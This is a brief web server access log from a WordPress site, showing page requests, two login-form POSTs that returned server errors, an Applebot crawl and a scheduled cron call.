24.144.93.79 - - [02/Sep/2026:06:30:59 -0500] "GET /product-category/accessories/ HTTP/1.1" 500 2704 "https://www.google.com/search?q=effefe" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
157.230.229.93 - - [02/Sep/2026:06:33:05 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
120.133.60.156 - - [02/Sep/2026:06:36:24 -0500] "POST /wp-login.php HTTP/1.1" 500 - "https://effefe.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
17.166.153.137 - - [02/Sep/2026:06:39:46 -0500] "GET /portfolio/orso-a-colori/ HTTP/1.1" 200 112645 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
157.90.185.123 - - [02/Sep/2026:06:39:49 -0500] "POST /wp-cron.php?doing_wp_cron=1788349188.9319729804992675781250 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
17.166.153.137 - - [02/Sep/2026:06:39:50 -0500] "GET /wp-content/uploads/elementor/css/local-3606-frontend-desktop.css?ver=6a87f44c2aeb9 HTTP/1.1" 200 115 "https://effefe.com/portfolio/orso-a-colori/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
